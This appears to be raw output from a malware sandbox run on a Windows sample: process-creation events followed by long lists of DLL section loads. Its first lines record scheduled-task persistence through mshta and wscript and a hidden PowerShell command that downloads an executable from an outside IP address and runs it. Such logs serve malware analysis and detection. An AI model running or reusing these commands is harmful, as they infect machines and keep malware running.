Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: unknown unknown
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
